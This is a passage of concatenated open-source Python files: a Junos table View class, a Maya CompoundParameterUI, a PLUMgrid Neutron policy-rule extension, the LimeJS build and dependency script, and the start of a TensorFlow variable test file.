deepcopy(self.__class__.GROUPS) self.GROUPS.update(more.groups) def _updater_class(self, more): """ called from extend """ if hasattr(more, 'fields'): self.FIELDS.update(more.fields.end) if hasattr(more, 'groups'): self.GROUPS.update(more.groups) @contextmanager def updater(self, fields=True, groups=False, all=True, **kvargs): """ provide the ability for subclassing objects to extend the definitions of the fields. this is implemented as a context manager with the form called from the subclass constructor: with self.extend() as more: more.fields = <dict> more.groups = <dict> # optional """ # --------------------------------------------------------------------- # create a new object class so we can attach stuff to it arbitrarily. # then pass that object to the caller, yo! # --------------------------------------------------------------------- more = type('RunstatViewMore', (object,), {})() if fields is True: more.fields = ViewFields() # --------------------------------------------------------------------- # callback through context manager # --------------------------------------------------------------------- yield more updater = self._updater_class if all is True else \ self._updater_instance updater(more) def asview(self, view_cls): """ create a new View object for this item """ return view_cls(self._table, self._xml) def refresh(self): """ ~~~ EXPERIMENTAL ~~~ refresh the data from the Junos device. this only works if the table provides an "args_key", does not update the original table, just this specific view/item """ warnings.warn("Experimental method: refresh") if self._table.can_refresh is not True: raise RuntimeError("table does not support this feature") # create a new table instance that gets only the specific named # value of this view tbl_xml = self._table._rpc_get(self.name) new_xml = tbl_xml.xpath(self._table.ITEM_XPATH)[0] self._init_xml(new_xml) return self def to_json(self): """ :returns: JSON encoded string of entire View contents """ return json.dumps(self, cls=TableViewJSONEncoder) # ------------------------------------------------------------------------- # OVERLOADS # ------------------------------------------------------------------------- def __repr__(self): """ returns the name of the View with the associate item name """ return "%s:%s" % (self.__class__.__name__, self.name) def __getattr__(self, name): """ returns a view item value, called as :obj.name: """ item = self.FIELDS.get(name) if item is None: raise ValueError("Unknown field: '%s'" % name) if 'table' in item: # if this is a sub-table, then return that now return item['table'](self.D, self._xml) # otherwise, not a sub-table, and handle the field astype = item.get('astype', str) if 'group' in item: if item['group'] in self._groups: found = self._groups[item['group']].xpath(item['xpath']) else: return else: found = self._xml.xpath(item['xpath']) len_found = len(found) if astype is bool: # handle the boolean flag case separately return bool(len_found) if not len_found: # even for the case of numbers, do not set the value. we # want to detect "does not exist" vs. defaulting to 0 # -- 2013-nov-19, JLS. return None try: # added exception handler to catch malformed xpath expressesion # -- 2013-nov-19, JLS. # added support to handle multiple xpath values, i.e. a list of # things that have the same xpath expression (common in configs) # -- 2031-dec-06, JLS # added support to use the element tag if the text is empty def _munch(x): if sys.version<'3': as_str = x if isinstance(x, str) else x.text if isinstance(as_str, unicode): as_str = as_str.encode('ascii','replace') else: as_str = x if isinstance(x, str) else x.text if as_str is not None: as_str = as_str.strip() if not as_str: as_str = x.tag # use 'not' to test for empty return astype(as_str) if 1 == len_found: return _munch(found[0]) return [_munch(this) for this in found] except: raise RuntimeError("Unable to handle field:'%s'" % name) # and if we are here, then we didn't handle the field. raise RuntimeError("Unable to handle field:'%s'" % name) def __getitem__(self, name): """ allow the caller to extract field values using :obj['name']: the same way they would do :obj.name: """ return getattr(self, name)
########################################################################## # # Copyright (c) 2010-2011, Image Engine Design Inc. All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are # met: # # * Redistributions of source code must retain the above copyright # notice, this list of conditions and the following disclaimer. # # * Redistributions in binary form must reproduce the above copyright # notice, this list of conditions and the following disclaimer in the # documentation and/or other materials provided with the distribution. # # * Neither the name of Image Engine Design nor the names of any # other contributors to this software may be used to endorse or # promote products derived from this software without specific prior # written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS # IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, # THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR # PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR # CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, # EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, # PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR # PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF # LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING # NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS # SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. # ########################################################################## from __future__ import with_statement import traceback import maya.cmds import IECore import IECoreMaya class CompoundParameterUI( IECoreMaya.ParameterUI ) : _collapsedUserDataKey = "aeCollapsed" ## Supports the following keyword arguments : # # bool "withCompoundFrame" # May be specified as True to force the creation of a # frameLayout even when this parameter is the toplevel parameter # for the node. # # list "visibleOnly" # A list of strings specifying the full parameter paths for # parameters which should be displayed. Any parameters not in # this list will not be visible. # # bool "labelVisible" # If not None, specifies whether or not the parameter label is visible. This # is used by the ClassVectorParameterUI ChildUI class. def __init__( self, node, parameter, labelVisible=None, **kw ) : self.__childUIs = {} self.__headerCreated = False self.__kw = kw.copy() self.__kw["hierarchyDepth"] = self.__kw.get( "hierarchyDepth", -1 ) + 1 originalParent = maya.cmds.setParent( query=True ) collapsible = self.__parameterIsCollapsible( node, parameter ) collapsed = self._retrieveCollapsedState( collapsible, parameter ) # we always use a Collapsible ui to hold our children, and just hide # the header if we don't actually want to collapse it ever. self.__collapsible = IECoreMaya.Collapsible( # need to specify a label on creation or maya gets the size wrong. # we'll update the label below, once we can call the base class label() method. label = "mustSpecifySomething", labelFont = self._labelFont( self.__kw["hierarchyDepth"] ), labelIndent = self._labelIndent( self.__kw["hierarchyDepth"] ), labelVisible = labelVisible if labelVisible is not None else collapsible, collapsed = collapsed, expandCommand = self.__expand, preExpandCommand = self.__preExpand, collapseCommand = self.__collapse, ) IECoreMaya.ParameterUI.__init__( self, node, parameter, # stealing someone else's top level ui for use as your own is really breaking the rules. # but we need to do it to reduce the nesting associated with making a new top level to put # the Collapsible class in, because otherwise maya 2010 will crash with deeply nested # hierarchies. we could stop doing this when we no longer need maya 2010 support. self.__collapsible._topLevelUI(), **kw ) self.__collapsible.setLabel( self.label() ) self.__collapsible.setAnnotation( self.description() ) self.__columnLayout = maya.cmds.columnLayout( parent = self.__collapsible.frameLayout(), width = 381 ) if not collapsed : self.__preExpand() maya.cmds.setParent( originalParent ) def replace( self, node, parameter ) : IECoreMaya.ParameterUI.replace( self, node, parameter ) if self.__parameterIsCollapsible() : collapsed = self._retrieveCollapsedState( self.getCollapsed() ) self.setCollapsed( collapsed, **self.__kw ) if len( self.__childUIs ) : for pName in self.__childUIs.keys() : ui = self.__childUIs[pName] p = self.parameter[pName] ui.replace( node, p ) else : if not self.getCollapsed() : with IECoreMaya.UITemplate( "attributeEditorTemplate" ) : self.__createChildUIs() ## Gets the collapsed state for the frame holding the child parameter uis. def getCollapsed( self ) : return self.__collapsible.getCollapsed() ## Sets the collapsed state for the frame holding the child parameter uis. # \param propagateToChildren How many levels of hierarchy to propagate # the new state to. If a Bool is passed, rather than an int, then # 'all' or 'none' is assumed, for backwards compatibility. def setCollapsed( self, collapsed, propagateToChildren=0, **kw ) : if type(propagateToChildren) == bool : propagateToChildren = 999 if propagateToChildren else 0 if not collapsed : # maya only calls preexpand when the ui is expanded by user action, # not by a script - how annoying. self.__preExpand() if self.__parameterIsCollapsible() : self.__collapsible.setCollapsed( collapsed ) self._storeCollapsedState( collapsed ) if propagateToChildren > 0 : propagateToChildren = propagateToChildren - 1 self.__propagateCollapsed( collapsed, propagateToChildren, **kw ) # This will retrieve the collapsedState from the parameters userData. It uses the # default key if 'collapsedUserDataKey' was not provided in the UI constructor's **kw. def _retrieveCollapsedState( self, default=True, parameter=None ) : if parameter is None : parameter = self.parameter key = self.__kw.get( "collapsedUserDataKey", CompoundParameterUI._collapsedUserDataKey ) if "UI" in parameter.userData() and key in parameter.userData()["UI"] : return parameter.userData()["UI"][ key ].value else : return default # This will store \param state in the parameters userData, under the default key, # unless 'collapsedUserDataKey' was provided in the UI constructor's **kw. def _storeCollapsedState( self, state ) : if "UI" not in self.parameter.userData() : self.parameter.userData()["UI"] = IECore.CompoundObject() key = self.__kw.get( "collapsedUserDataKey", CompoundParameterUI._collapsedUserDataKey ) self.parameter.userData()["UI"][key] = IECore.BoolData( state ) # Returns True if the ui should be collapsible for this parameter, False # otherwise. def __parameterIsCollapsible( self, node=None, parameter=None ) : if node is None : node = self.node() if parameter is None : parameter = self.parameter fnPH = IECoreMaya.FnParameterisedHolder( node ) collapsible = not parameter.isSame( fnPH.getParameterised()[0].parameters() ) with IECore.IgnoredExceptions( KeyError ) : collapsible = parameter.userData()["UI"]["collapsible"].value with IECore.IgnoredExceptions( KeyError ) : collapsible = parameter.userData()["UI"]["collapsable"].value collapsible = self.__kw.get( "withCompoundFrame", False ) or collapsible return collapsible @staticmethod def _labelFont( hierarchyDepth ) : if hierarchyDepth == 2 : return "smallBoldLabelFont" elif hierarchyDepth >= 3 : return "tinyBoldLabelFont" else : return "boldLabelFont" @staticmethod def _labelIndent( hierarchyDepth ) : return 5 + ( 8 * max( 0, hierarchyDepth-1 ) ) ## May be implemented by derived classes to present some custom ui at the # top of the list of child parameters. Implementations should first call the # base class method and then perform their custom behaviour, placing ui elements # into the provided columnLayout. def _createHeader( self, columnLayout, **kw ) : draggable = False try: draggable = self.parameter.userData()['UI']['draggable'].value except : pass ## \todo Figure out what this draggable stuff is all about and document it. # I think it's intended to allow parameters to be dragged and dropped onto # an IECoreMaya.ParameterPanel but I can't get that to work right now. if draggable : maya.cmds.rowLayout( numberOfColumns = 2, columnWidth2 = ( 361, 20 ), parent = columnLayout ) maya.cmds.text( label = "" ) dragIcon = maya.cmds.iconTextStaticLabel( image = "pick.xpm", height = 20 ) self.addDragCallback( dragIcon, **kw ) self.__headerCreated = True ## May be called by derived classes if for any reason the child parameter # uis are deemed invalid - for instance if the child parameters have changed. # The uis will then be rebuilt during the next call to replace(). def _deleteChildParameterUIs( self ) : maya.cmds.control( self.__columnLayout, edit=True, manage=False ) for ui in self.__childUIs.values() : maya.cmds.deleteUI( ui.layout() ) self.__childUIs = {} maya.cmds.control( self.__columnLayout, edit=True, manage=True ) def __expand( self ) : self._storeCollapsedState( False ) modifiers = maya.cmds.getModifiers() if modifiers & 1 : # shift is held self.__propagateCollapsed( False, 999, lazy=True ) elif modifiers & 8 : # alt is held depth = 1; with IECore.IgnoredExceptions( KeyError ) : depth = self.parameter.userData()["UI"]["autoExpandDepth"].value self.__propagateCollapsed( False, depth, lazy=True ) def __collapse(self): self._storeCollapsedState( True ) # \todo Store collapse state modifiers = maya.cmds.getModifiers() if modifiers & 1 : # shift is held self.__propagateCollapsed( True, 999 ) elif modifiers & 8 : # alt is held depth = 1; with IECore.IgnoredExceptions( KeyError ) : depth = self.parameter.userData()["UI"]["autoExpandDepth"].value self.__propagateCollapsed( True, depth ) def __preExpand( self ) : # this is the most common entry point into the ui # creation code, and unfortunately it's called from # a maya ui callback. maya appears to suppress all # exceptions which occur in such callbacks, so we # have to wrap with our own exception handling to # make sure any errors become visible. try : with IECoreMaya.UITemplate( "attributeEditorTemplate" ) : if not self.__headerCreated : self._createHeader( self.__columnLayout, **self.__kw ) if not len( self.__childUIs ) : self.__createChildUIs() except : IECore.msg( IECore.Msg.Level.Error, "IECoreMaya.ParameterUI", traceback.format_exc() ) def __propagateCollapsed( self, collapsed, propagateDepth=999, **kw ) : for ui in self.__childUIs.values() : if hasattr( ui, "setCollapsed" ) : ui.setCollapsed( collapsed, propagateDepth, **kw ) def __createChildUIs( self ) : self.__kw['labelWithNodeName'] = False for pName in self.parameter.keys(): p = self.parameter[pName] visible = True try: visible = p.userData()['UI']['visible'].value except: pass if 'visibleOnly' in self.__kw : fullChildName = self.__kw['longParameterName'] if fullChildName : fullChildName += "." fullChildName += pName visible = fullChildName in self.__kw['visibleOnly'] if not visible and p.isInstanceOf( IECore.TypeId.CompoundParameter ) : for i in self.__kw['visibleOnly'] : if i.startswith( fullChildName + "." ) : visible = True break if visible: maya.cmds.setParent( self.__columnLayout ) ui = IECoreMaya.ParameterUI.create( self.node(), p, **self.__kw ) if ui: self.__childUIs[pName] = ui IECoreMaya.ParameterUI.registerUI( IECore.TypeId.CompoundParameter, CompoundParameterUI )
# Copyright 2016 PLUMgrid, Inc. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. import networking_plumgrid from networking_plumgrid._i18n import _ from neutron.api import extensions from neutron.api.v2 import attributes as attr from neutron.api.v2 import base from neutron import manager from neutron_lib.api import validators from neutron_lib import exceptions as nexceptions from random import randint PG_POLICY_RULE = 'policy_rule' PG_POLICY_RULES = 'policy-rules' extensions.append_api_extensions_path( networking_plumgrid.neutron.plugins.extensions.__path__) class PolicyRuleInvalidPortRange(nexceptions.InvalidInput): message = _("Invalid port range specified '%(port)s'. Following format " "is supported e.g. '%(min)s-%(max)s'") class NoPolicyRuleFound(nexceptions.NotFound): message = _("Policy Rule with id '%(id)s' does not exist.") class NoPolicyGroupFound(nexceptions.NotFound): message = _("Policy Group with id '(%(id)s)' specified as " "%(policy_config)s does not exist.") class InvalidPolicyGroupForPolicy(nexceptions.InvalidInput): message = _("Policy Group with id '%(id)s' and type '%(type)s' " "cannot be specified as '%(policy_config)s' for policy.") class InvalidPolicyRuleConfig(nexceptions.InvalidInput): message = _("Policy Rule only supports source_epg, " "destination_epg and service_epg.") def _validate_port_range(data, valid_values=None): if not data: return try: lower_bound, upper_bound = data.split('-') lower_bound_val = int(lower_bound) upper_bound_val = int(upper_bound) except (ValueError, TypeError): port_range_min = randint(1, 65535) port_range_max = randint(port_range_min, 65535) raise PolicyRuleInvalidPortRange(port=data, min=str(port_range_min), max=str(port_range_max)) if (not (lower_bound_val >= 0 and lower_bound_val <= 65535 and upper_bound_val >= 0 and upper_bound_val <= 65535) and lower_bound_val <= upper_bound_val): port_range_min = randint(1, 65535) port_range_max = randint(port_range_min, 65535) raise PolicyRuleInvalidPortRange(port=data, min=str(port_range_min), max=str(port_range_max)) def _validate_action_target(self, action_target): #TODO(muawiakhan):FIXME return action_target validators.validators['type:validate_port_range'] = _validate_port_range validators.validators['type:validate_action_target'] = _validate_action_target ep_supported_protocols = ['any', 'tcp', 'udp', 'icmp'] ep_supported_actions = ['copy', 'allow'] RESOURCE_ATTRIBUTE_MAP = { 'policy_rule': { 'id': { 'allow_post': False, 'allow_put': False, 'validate': { 'type:uuid': None }, 'is_visible': True, 'primary_key': True }, 'name': { 'allow_post': True, 'allow_put': False, 'is_visible': True, 'default': '' }, 'src_grp': { 'allow_post': True, 'allow_put': False, 'is_visible': True, 'default': None }, 'dst_grp': { 'allow_post': True, 'allow_put': False, 'is_visible': True, 'default': None }, 'tag': { 'allow_post': True, 'allow_put': False, 'is_visible': True, 'default': None }, 'protocol': { 'allow_post': True, 'allow_put': False, 'is_visible': True, 'default': 'any', 'validate': { 'type:values': ep_supported_protocols } }, 'src_port_range': { 'allow_post': True, 'allow_put': False, 'is_visible': True, 'default': None, 'validate': { 'type:validate_port_range': None } }, 'dst_port_range': { 'allow_post': True, 'allow_put': False, 'is_visible': True, 'default': None, 'validate': { 'type:validate_port_range': None } }, 'action': { 'allow_post': True, 'allow_put': False, 'is_visible': True, 'default': None, 'validate': {'type:values': ep_supported_actions} }, 'action_target': { 'allow_post': True, 'allow_put': False, 'is_visible': True, 'default': None, 'validate': { 'type:validate_action_target': None }, }, 'tenant_id': { 'allow_post': True, 'allow_put': False, 'required_by_policy': True, 'validate': {'type:string': attr.TENANT_ID_MAX_LEN}, 'is_visible': True } } } class Policyrule(extensions.ExtensionDescriptor): @classmethod def get_name(cls): return "Policy Rule" @classmethod def get_alias(cls): return "policy-rule" @classmethod def get_description(cls): return "This API will be used to configure policy rules inside" \ " policy groups from Neutron and map it in PLUMgrid." @classmethod def get_namespace(cls): return "http://docs.openstack.org/ext/policy_rule" \ "/api/v2.0" @classmethod def get_updated(cls): return "2016-01-01T00:00:00-00:00" @classmethod def get_resources(cls): exts = [] plugin = manager.NeutronManager.get_plugin() resource_name = PG_POLICY_RULE collection_name = PG_POLICY_RULES params = RESOURCE_ATTRIBUTE_MAP.get(resource_name, dict()) controller = base.create_resource( collection_name, resource_name, plugin, params) ex = extensions.ResourceExtension(collection_name, controller) exts.append(ex) return exts
#!/usr/bin/env python """Utilities for common tasks needed to use lime framework. """ import optparse import subprocess import logging import sys import os.path import zipfile import re import shutil import fileinput import mimetypes from os.path import join, splitext, split, exists from shutil import copyfile from datetime import datetime import base64 import json if sys.version_info[0]==3: from urllib.request import urlretrieve else : from urllib import urlretrieve basedir = os.path.dirname(os.path.dirname(os.path.realpath(__file__))) curdir = os.path.abspath('.') closure_dir = os.path.join(basedir,'closure') closure_deps_file = os.path.join(closure_dir,'closure/goog/deps.js') box2d_dir = os.path.join(basedir,'box2d') extdir = join(basedir,'bin/external') compiler_path = os.path.join(extdir,'compiler.jar') soy_path = os.path.join(extdir,'SoyToJsSrcCompiler.jar') projects_path = join(basedir,'bin/projects') # zipfile.extract & os.path.relpath missing in 2.5 if sys.version_info < (2,6): print("Error. Python 2.6+ is required") sys.exit(1) def removeDupes(seq): # Not order preserving keys = {} for e in seq: keys[e.rstrip()] = 1 return keys.keys() def makeProjectPaths(add): lines = open(projects_path,'r').readlines() if len(add): lines.append(add) newlines = filter(lambda x: exists(join(basedir,x.rstrip())) and len(x.rstrip()),lines) newlines = removeDupes(newlines) f = open(projects_path,'w') f.write('\n'.join(newlines)) f.close() def rephook(a,b,c): sys.stdout.write("\r%2d%%" % ((100*a*b)/c) ) sys.stdout.flush() def escapeSpace(s): return s.replace(" ","\\ ") def quoteSpace(s): return s.replace(" ","' '") def checkDependencies(): #Check git retcode = subprocess.Popen(subprocess.list2cmdline(["git","--version"]), stdout=subprocess.PIPE,stderr=subprocess.PIPE,shell=True).wait() if retcode!=0: logging.error('Lime requires git. Get it from http://git-scm.com/download') sys.exit(1) #Closure Library if not (os.path.exists(closure_dir) and os.path.exists(closure_deps_file)): print ('Closure Library not found. Downloading to %s' % closure_dir) print ('Please wait...') retcode = subprocess.Popen(subprocess.list2cmdline(["git","clone","https://github.com/google/closure-library.git",closure_dir]),shell=True).wait() if(retcode!=0): print ('Failed to clone Closure Library via Git. Discontinuing.') sys.exit(1) retcode = subprocess.Popen(subprocess.list2cmdline(["git","checkout","161037749f1efee3142630bba5092709cb09f796"]),shell=True,cwd=closure_dir).wait() if(retcode!=0): print ('Failed to clone Closure Library via Git. Discontinuing.') sys.exit(1) #Box2D if not os.path.exists(box2d_dir): print ('Box2DJS not found. Downloading to %s' % box2d_dir) print ('Please wait...') retcode = subprocess.Popen(subprocess.list2cmdline(["git","clone","https://github.com/thinkpixellab/pl.git",box2d_dir]),shell=True).wait() if(retcode!=0): logging.error('Error while downloading Box2D. Discontinuing.') sys.exit(1) #External tools dir if not os.path.exists(extdir): os.mkdir(extdir) #Closure compiler if not os.path.exists(compiler_path): zip_path = os.path.join(extdir,'compiler.zip') print ('Downloading Closure Compiler: ') urlretrieve("http://closure-compiler.googlecode.com/files/compiler-20130411.zip",zip_path,rephook) print ('\nUnzipping...') zippedFile = zipfile.ZipFile(zip_path) zippedFile.extract('compiler.jar',extdir) zippedFile.close() print ('Cleanup') os.unlink(zip_path) os.rename(os.path.join(extdir,'compiler.jar'), compiler_path) #Closure Templates if not os.path.exists(soy_path): zip_path = os.path.join(extdir,'soy.zip') print ('Downloading Closure Templates(Soy):') urlretrieve("http://closure-templates.googlecode.com/files/closure-templates-for-javascript-latest.zip", zip_path,rephook) print ('\nUnzipping...') zippedFile = zipfile.ZipFile(zip_path) zippedFile.extract('SoyToJsSrcCompiler.jar',extdir) zippedFile.close() print ('Cleanup') os.unlink(zip_path) if not os.path.exists(projects_path): open(projects_path,'w').close() makeProjectPaths('') def update(): reldir = os.path.relpath(curdir,basedir) if reldir!='.': makeProjectPaths(reldir) print ('Updating Closure deps file') paths = open(projects_path,'r').readlines() paths.append('lime\n') paths.append('box2d/src\n') opt = ' '.join(map(lambda x: '--root_with_prefix="'+quoteSpace(os.path.join(basedir,x.rstrip()))+'/ ../../../'+x.rstrip()+'/"',paths)) call = 'python ' + escapeSpace(os.path.join(closure_dir,'closure/bin/build/depswriter.py'))+' --root_with_prefix="'+\ quoteSpace(closure_dir)+'/ ../../" '+opt+' --output_file="'+closure_deps_file+'"' print (call) subprocess.call(call,shell=True) def create(name): path = os.path.join(basedir,name) if exists(path): logging.error('Directory already exists: %s',path) sys.exit(1) name = os.path.basename(path) proj = os.path.relpath(path,basedir) shutil.copytree(os.path.join(basedir,'lime/templates/default'),path) for root, dirs, files in os.walk(path): for fname in files: newname = fname.replace('__name__',name) if fname.find("__name__")!=-1: os.rename(os.path.join(root,fname),os.path.join(root,newname)) for line in fileinput.FileInput(os.path.join(root,newname),inplace=1): line = line.replace('{name}',name) print(line.rstrip()) print ('Created %s' % path) if proj!='.': makeProjectPaths(os.path.relpath(path,basedir)) update() def makeSoyJSFile(path,stringbuilder): if path[-4:]=='.soy': call = "java -jar "+soy_path+" --cssHandlingScheme goog --shouldProvideRequireSoyNamespaces --outputPathFormat "+path+".js " if not stringbuilder: call+= "--codeStyle concat " call += path; print (call) subprocess.call(call,shell=True) def genSoy(path): if not os.path.exists(path): logging.error('No such directory %s',path) exit(1) if os.path.isfile(path): mtype = mimetypes.guess_type(path)[0] fname = split(path)[1] if path[-4:]=='.soy': makeSoyJSFile(path,True) elif path[-5:]=='.json': infile= open(path,'r') outfile = open(path+'.js','w') outfile.write('goog.provide(\'lime.ASSETS.'+fname+'\');\ngoog.require(\'soy\');\n\n'+ \ 'lime.ASSETS.'+fname+'.data = function(opt_data) { \nreturn JSON.parse("'+ json.dumps(json.loads(infile.read()), separators=(',',':')).replace("\"", "\\\"")+'");\n}') infile.close() outfile.close() elif mtype and ['image','audio','video'].count(mtype.split('/')[0]): infile= open(path,'r') outfile = open(path+'.soy','w') outfile.write('{namespace lime.ASSETS.'+fname+'}\n\n/**\n * Generated with "bin/lime.py gensoy filepath"\n */\n{template .data}\n{literal}') outfile.write('data:'+mtype+';base64,') outfile.write(base64.b64encode(infile.read())) outfile.write('{/literal}\n{/template}\n') infile.close() outfile.close() makeSoyJSFile(path+'.soy',False) else : outfile = open(path+'.soy','w') outfile.write('{namespace lime.ASSETS.'+fname+'}\n\n/**\n * Generated with "bin/lime.py gensoy filepath"\n */\n{template .data}\n') for line in fileinput.FileInput(path): line = line.replace('{','[[LB_POS]]') line = line.replace('}','[[RB_POS]]') line = line.replace('[[LB_POS]]','{lb}') line = line.replace('[[RB_POS]]','{rb}') outfile.write(line); outfile.write('\n{/template}\n') outfile.close() makeSoyJSFile(path+'.soy',False) else: for root,dirs,files in os.walk(path): for fname in files: if fname[-4:]=='.soy': soypath = os.path.join(root,fname) makeSoyJSFile(soypath,False) update() def build(name,options): dir_list = open(projects_path,'r').readlines() dir_list.append('lime') dir_list.append('box2d/src') dir_list.append('closure') #dir_list = filter(lambda x: os.path.isdir(os.path.join(basedir,x)) and ['.git','bin','docs'].count(x)==0 ,os.listdir(basedir)) opt = ' '.join(map(lambda x: '--root="'+os.path.join(basedir,x.rstrip())+'/"',dir_list)) call = 'python ' + escapeSpace(os.path.join(closure_dir,'closure/bin/build/closurebuilder.py'))+' '+opt+' --namespace="'+name+'" '+\ '-o compiled -c '+compiler_path; if options.advanced: call+=" -f --compilation_level=ADVANCED_OPTIMIZATIONS" if options.debug: call+=" -f --debug -f --formatting=PRETTY_PRINT" if options.externs_file: for i, opt in enumerate(options.externs_file): call+=" -f --externs="+opt outname = options.output if options.output[-3:] != '.js': outname += '.js' if options.map_file: call+=" -f --formatting=PRETTY_PRINT -f --source_map_format=V3 -f --create_source_map="+outname+'.map' else: call+=" -f --define='goog.DEBUG=false'" if options.use_strict: call+=" -f --language_in=ECMASCRIPT5_STRICT" if options.define: for i, opt in enumerate(options.define): call+=" -f --define='"+opt+"'" if options.output: call+=' --output_file="'+outname+'"' if not exists(os.path.dirname(outname)): os.makedirs(os.path.dirname(outname)) errhandle = 0 try: subprocess.check_call(call, shell=True); except subprocess.CalledProcessError: # handle error later errhandle = 1 pass if options.map_file: map_filename = outname+'.map' map_file = open(map_filename, 'r+') # make source paths relative in map file data = json.load(map_file) data['sources'] = map(lambda p: os.path.relpath(p, os.path.dirname(map_filename)), data['sources']) map_file.close() map_file = open(map_filename, 'w') json.dump(data, map_file) map_file.close() # add path to map file out_file = open(outname, 'a') out_file.write('\n//@ sourceMappingURL=' + os.path.relpath(map_filename, os.path.dirname(outname))) out_file.close() if options.output and options.preload: name = os.path.basename(outname)[:-3] target = os.path.dirname(outname) source = os.path.join(basedir,'lime/templates/preloader') for root, dirs, files in os.walk(source): for fname in files: from_ = join(root, fname) to_ = from_.replace(source, target, 1) to_directory = split(to_)[0] to_ = to_.replace('__name__',name) if not exists(to_directory): os.makedirs(to_directory) if not exists(to_): copyfile(from_, to_) for root, dirs, files in os.walk(target): for fname in files: if exists(os.path.join(target,fname)): for line in fileinput.FileInput(os.path.join(target,fname),inplace=1): line = line.replace('{name}',name) line = line.replace('{callback}',options.preload) if fname == name+'.manifest': line = re.sub(r'# Updated on:.*','# Updated on: '+datetime.now().strftime("%Y-%m-%d %H:%M:%S"),line) print(line.rstrip()) if errhandle == 1: exit(1) def main(): """The entrypoint for this script.""" usage = """usage: %prog [command] [options] Commands: init Check lime dependecies and setup if needed update Update Closure dependency file. Need to run every time you change goog.provide() or goog.require() create [path/name] Setup new project [name] gensoy [path] Convert all *.soy files under path to *.soy.js files build [name] Compile project to single Javascript file""" parser = optparse.OptionParser(usage) parser.add_option("-a", "--advanced", dest="advanced", action="store_true", help="Build uses ADVANCED_OPTIMIZATIONS mode (encouraged)") parser.add_option("-g", "--debug", dest="debug", action="store_true", help="Closure Compiler: longer names for symbols for debugging of the advanced optimizations.") parser.add_option('-e', '--externs', dest="externs_file", action='append', help="File with externs declarations.") parser.add_option("-o", "--output", dest="output", action="store", type="string", help="Output file for build result") parser.add_option("-m", "--map", dest="map_file", action="store_true", help="Build result sourcemap for debugging. Also turns on pretty print.") parser.add_option("-s", "--use-strict", dest="use_strict", action="store_true", help="Use EcmaScript5 strict mode.") parser.add_option("-p", "--preload", dest="preload", action="store", type="string", help="Generate preloader code with given callback as start point.") parser.add_option("-d", "--define", dest="define", action="append", help="Define custom variable accessible before build.") (options, args) = parser.parse_args() if not (len(args) == 2 or (len(args)==1 and ['init','update'].count(args[0])==1 )) : parser.error('incorrect number of arguments') checkDependencies() if args[0]=='init' or args[0]=='update': update() elif args[0]=='create': create(args[1]) elif args[0]=='gensoy': genSoy(args[1]) elif args[0]=='build': build(args[1],options) else: logging.error('No such command: %s',args[0]) exit(1) if __name__ == '__main__': main()
# Copyright 2016 The TensorFlow Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== """variables tests.""" from __future__ import absolute_import from __future__ import division from __future__ import print_function import os import numpy as np import tensorflow as tf class LocalVariableTest(tf.test.TestCase): def test_local_variable(self): with self.test_session() as sess: self.assertEquals([], tf.local_variables()) value0 = 42 tf.contrib.framework.local_variable(value0) value1 = 43 tf.contrib.framework.local_variable(value1) variables = tf.local_variables() self.assertEquals(2, len(variables)) self.assertRaises(tf.OpError, sess.run, variables) tf.initialize_variables(variables).run() self.assertAllEqual(set([value0, value1]), set(sess.run(variables))) def testLocalVariableNameAndShape(self): with self.test_session(): with tf.variable_scope('A'): a = tf.contrib.framework.local_variable([1, 1, 1, 1, 1], name='a') self.assertEquals(a.op.name, 'A/a') self.assertListEqual(a.get_shape().as_list(), [5]) self.assertListEqual([a], tf.contrib.framework.get_local_variables()) def testLocalVariableNotInAllVariables(self): with self.test_session(): with tf.variable_scope('A'): a = tf.contrib.framework.local_variable(0) self.assertFalse(a in tf.all_variables()) self.assertTrue(a in tf.local_variables()) def testLocalVariableNotInVariablesToRestore(self): with self.test_session(): with tf.variable_scope('A'): a = tf.contrib.framework.local_variable(0) self.assertFalse(a in tf.contrib.framework.get_variables_to_restore()) self.assertTrue(a in tf.local_variables()) def testGetVariablesDontReturnsTransients(self): with self.test_session(): with tf.variable_scope('A'): tf.contrib.framework.local_variable(0) with tf.variable_scope('B'): tf.contrib.framework.local_variable(0) self.assertEquals([], tf.contrib.framework.get_variables('A')) self.assertEquals([], tf.contrib.framework.get_variables('B')) def testGetLocalVariablesReturnsTransients(self): with self.test_session(): with tf.variable_scope('A'): a = tf.contrib.framework.local_variable(0) with tf.variable_scope('B'): b = tf.contrib.framework.local_variable(0) self.assertEquals([a], tf.contrib.framework.get_local_variables('A')) self.assertEquals([b], tf.contrib.framework.get_local_variables('B')) def testInitializedVariableValue(self): with self.test_session() as sess: a = tf.contrib.framework.local_variable([0, 0, 0, 0, 0], name='a') sess.run(tf.initialize_local_variables()) self.assertAllEqual(a.eval(), [0]*5) class GlobalStepTest(tf.test.TestCase): def _assert_global_step(self, global_step, expected_dtype=tf.int64): 